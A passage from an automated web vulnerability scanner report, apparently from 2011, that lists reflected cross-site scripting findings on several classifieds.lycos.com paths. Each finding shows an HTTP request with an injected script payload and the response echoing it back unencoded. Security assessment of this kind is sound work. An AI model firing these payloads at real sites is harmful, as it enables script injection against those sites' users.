P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-work_from_home/?57054"><script>alert(1)</script>094863826eb=1&mobile=1" rel="nofollow">
...[SNIP]...

1.87. http://classifieds.lycos.com/job/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f385"><script>alert(1)</script>76fb73576c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job2f385"><script>alert(1)</script>76fb73576c2/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:18 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job2f385"><script>alert(1)</script>76fb73576c2/?mobile=1" rel="nofollow">
...[SNIP]...

1.88. http://classifieds.lycos.com/job/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d8b7"><script>alert(1)</script>809a2f23ff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job/?7d8b7"><script>alert(1)</script>809a2f23ff8=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job/?7d8b7"><script>alert(1)</script>809a2f23ff8=1&mobile=1" rel="nofollow">
...[SNIP]...

1.89. http://classifieds.lycos.com/personals/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /personals/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9028c"><script>alert(1)</script>6a01bc38598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /personals9028c"><script>alert(1)</script>6a01bc38598/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/personals9028c"><script>alert(1)</script>6a01bc38598/?mobile=1" rel="nofollow">
...[SNIP]...

1.90. http://classifieds.lycos.com/personals/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /personals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66b0"><script>alert(1)</script>aa27322bcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /personals/?f66b0"><script>alert(1)</script>aa27322bcf1=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/personals/?f66b0"><script>alert(1)</script>aa27322bcf1=1&mobile=1" rel="nofollow">
...[SNIP]...

1.91. http://classifieds.lycos.com/post/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 731a1"><script>alert(1)</script>759aa8706ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post731a1"><script>alert(1)</script>759aa8706ec/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:58:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/post731a1"><script>alert(1)</script>759aa8706ec/?mobile=1" rel="nofollow">
...[SNIP]...

1.92. http://classifieds.lycos.com/post/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ff76"><script>alert(1)</script>65823c63197 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?3ff76"><script>alert(1)</script>65823c63197=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:57:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:57:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/post/?3ff76"><script>alert(1)</script>65823c63197=1&mobile=1" rel="nofollow">
...[SNIP]...

1.93. http://classifieds.lycos.com/sale-clothes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-clothes/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ac9"><script>alert(1)</script>c8f3dc213dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-clothesf2ac9"><script>alert(1)</script>c8f3dc213dd/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-clothesf2ac9"><script>alert(1)</script>c8f3dc213dd/?mobile=1" rel="nofollow">
...[SNIP]...

1.94. http://classifieds.lycos.com/sale-clothes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-clothes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d400c"><script>alert(1)</script>84050bf8d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-clothes/?d400c"><script>alert(1)</script>84050bf8d91=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:26 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-clothes/?d400c"><script>alert(1)</script>84050bf8d91=1&mobile=1" rel="nofollow">
...[SNIP]...

1.95. http://classifieds.lycos.com/sale-collectible/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-collectible/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e51"><script>alert(1)</script>ece04b856b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-collectiblec9e51"><script>alert(1)</script>ece04b856b8/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-collectiblec9e51"><script>alert(1)</script>ece04b856b8/?mobile=1" rel="nofollow">
...[SNIP]...

1.96. http://classifieds.lycos.com/sale-collectible/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-collectible/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 959b6"><script>alert(1)</script>55cec2650f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-collectible/?959b6"><script>alert(1)</script>55cec2650f8=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:06:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:06:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-collectible/?959b6"><script>alert(1)</script>55cec2650f8=1&mobile=1" rel="nofollow">
...[SNIP]...

1.97. http://classifieds.lycos.com/sale-electronics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-electronics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b301e"><script>alert(1)</script>2d184bf1887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-electronicsb301e"><script>alert(1)</script>2d184bf1887/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-electronicsb301e"><script>alert(1)</script>2d184bf1887/?mobile=1" rel="nofollow">
...[SNIP]...

1.98. http://classifieds.lycos.com/sale-electronics/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-electronics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb76"><script>alert(1)</script>3f65cb4ffd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-electronics/?6eb76"><script>alert(1)</script>3f65cb4ffd7=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:06:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:06:54 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-electronics/?6eb76"><script>alert(1)</script>3f65cb4ffd7=1&mobile=1" rel="nofollow">
...[SNIP]...

1.99. http://classifieds.lycos.com/sale-entertainment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3731a"><script>alert(1)</script>3d3a5d53bc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-entertainment3731a"><script>alert(1)</script>3d3a5d53bc0/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-entertainment3731a"><script>alert(1)</script>3d3a5d53bc0/?mobile=1" rel="nofollow">
...[SNIP]...

1.100. http://classifieds.lycos.com/sale-entertainment/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-entertainment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0491"><script>alert(1)</script>19881e9aaba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-entertainment/?d0491"><script>alert(1)</script>19881e9aaba=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-entertainment/?d0491"><script>alert(1)</script>19881e9aaba=1&mobile=1" rel="nofollow">
...[SNIP]...

1.101. http://classifieds.lycos.com/sale-free/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-free/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3718"><script>alert(1)</script>7a2e16f3111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-freeb3718"><script>alert(1)</script>7a2e16f3111/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-freeb3718"><script>alert(1)</script>7a2e16f3111/?mobile=1" rel="nofollow">
...[SNIP]...

1.102. http://classifieds.lycos.com/sale-free/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-free/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dd1"><script>alert(1)</script>6bbefb1baf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

